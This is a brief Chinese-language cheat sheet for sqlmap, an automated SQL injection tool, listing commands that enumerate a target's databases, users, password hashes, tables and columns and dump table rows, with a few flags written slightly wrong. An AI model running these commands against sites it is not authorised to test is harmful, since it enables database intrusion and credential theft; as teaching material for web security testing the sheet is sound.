sqlmap用法

sqlmap是一个工具，一个用来做sql注入攻击的工具，即对检测与利用的自动化处理（数据库指纹、访问底层文件系统、执行命令）。[[[] 徐焱 李文轩 王东亚，web安全攻防子工业出版社，2018.]]Sqlmap常用命令：
(1) 查看一共有几个库
python sqlmap.py -u “url” --batch --dbs
(2) 查看当前使用的数据库是哪个
python sqlmap.py -u “url” --batch --current --dbs
(3) 查看哪个账号访问的哪个库
python sqlmap.py -u “url” --batch --current-user
(4) 查看一共多少个账户
python sqlmap.py -u “url” --batch --users
(5) 查看当前用户账号和密码
python sqlmap.py -u “url” --batch --passwords
(6) 查看当前数据库的所有表名
python sqlmap.py -u “url” --batch -D 库名 --tables
-D:指定数据名称
(7) 查看当前数据库下某表名下的字段名
python sqlmap.py -u “url” --batch -D 库名 -T autolog --columns
-D代表某个库，-T代表某个表，–columns代表表中所有列字段
(8) 查看字段内容
python sqlmap.py -u “url” --batch -D 库名 -T autolog -C id,reqUrl,reqData --start1 --stop10 --dump
-C:可以指定字段 --dump导出
–start指定导出的开始的行 --stop指定导出结束的行